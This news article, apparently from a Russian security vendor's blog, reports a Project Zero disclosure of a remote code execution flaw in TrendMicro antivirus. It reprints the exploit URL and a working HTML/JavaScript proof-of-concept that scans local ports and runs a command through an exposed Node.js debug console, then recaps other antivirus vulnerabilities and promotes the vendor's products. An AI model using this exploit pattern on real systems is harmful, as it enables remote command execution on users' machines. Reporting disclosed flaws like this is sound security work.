
Critical vulnerability in TrendMicro antivirus allows remote code execution



Tavis Ormandy, a researcher on Google's Project Zero team, has published details of a critical vulnerability in TrendMicro antivirus. As he found, a flaw in the product caused it to start a Node.js debugging console listening on a local TCP port. Anything that could reach that port, including any web page the user opened in a browser, could hand it commands for execution on the computer with the antivirus installed. Ormandy himself called the bug "absurd" in his report.

To exploit the vulnerability, an attacker only needs to send a request of the form:

```
http://localhost:50820/json/new/?javascript:require('child_process').spawnSync('calc.exe')
```

Ormandy also published a simple proof-of-concept exploit: a web page that probes every port the debug console might be listening on by loading an image from each, so the payload runs as soon as a request hits the right port:

```html
<script>
// Scan the port range the Node.js debug console may be listening on; each
// request is an <img> load, so no cross-origin restriction applies.
var port = 49152;
var maxport = 60000;
var concurrent = 128;

function nextPort() {
  var img = document.createElement('IMG');
  img.alt = "Testing " + port + "...";
  img.src = "http://127.0.0.1:" + port++ + "/json/new/?"
          + "javascript:require('child_process')"
          + ".spawnSync('calc.exe')";
  // Whether the load "succeeds" or fails, move on to the next port.
  img.onload = img.onerror = function(e) {
    document.body.removeChild(e.target);
    nextPort();
  }
  if (port < maxport) {
    document.body.appendChild(img);
  }
}

// Keep 128 probes in flight at once.
for (i = 0; i < concurrent; i++) nextPort();
</script>
```



Ormandy's report was published on March 22, and a little over a week later, on March 30, the company released a patch that partially fixes the problem: it could not be eliminated entirely, but "the most critical problems" were resolved.

The company also issued a statement saying that only its consumer products are affected, not its products for corporate customers. The statement was quoted by the British outlet The Register.

This is not the first serious vulnerability in security software, or attack on an antivirus vendor, uncovered over the past year. In early February 2016 the same researcher, Tavis Ormandy, found serious vulnerabilities in Malwarebytes: its updates were not digitally signed by the vendor and were downloaded over unencrypted HTTP, leaving users open to man-in-the-middle (MITM) attacks.

Earlier, in June 2015, media reported that British and American intelligence agencies had been looking for vulnerabilities in Kaspersky Lab products. Around the same time, Google Project Zero researchers described a serious vulnerability in ESET NOD32 Antivirus that allowed an attacker to read, modify and delete any file on a computer with the antivirus installed.

In the summer of that year, it became known that a number of serious vulnerabilities had been found in Symantec Endpoint Protection, allowing attackers to bypass authentication, escalate privileges, read and write files, and perform SQL injection. At almost the same time it was announced that the antivirus company BitDefender had been hacked, and user passwords that had been stored in clear text were stolen.

Later, in the fall of 2015, serious security bugs were found in the TrueCrypt encryption software, and a few months after that, in December of the same year, critical vulnerabilities were found in Avast antivirus.

Also last fall, security researcher Mazin Ahmed published a study in which he found XSS vulnerabilities in several popular web application firewalls at once. We tested the self-learning PT Application Firewall against the bypasses described in that work, and all of them were blocked by the firewall.

To head off problems caused by the security of protection tools themselves, you can also use solutions that isolate such tools from other systems while preserving their functionality. PT MultiScanner, for example, is a system of this kind for detecting malicious files and links.

Source: https://habr.com/ru/post/280832/

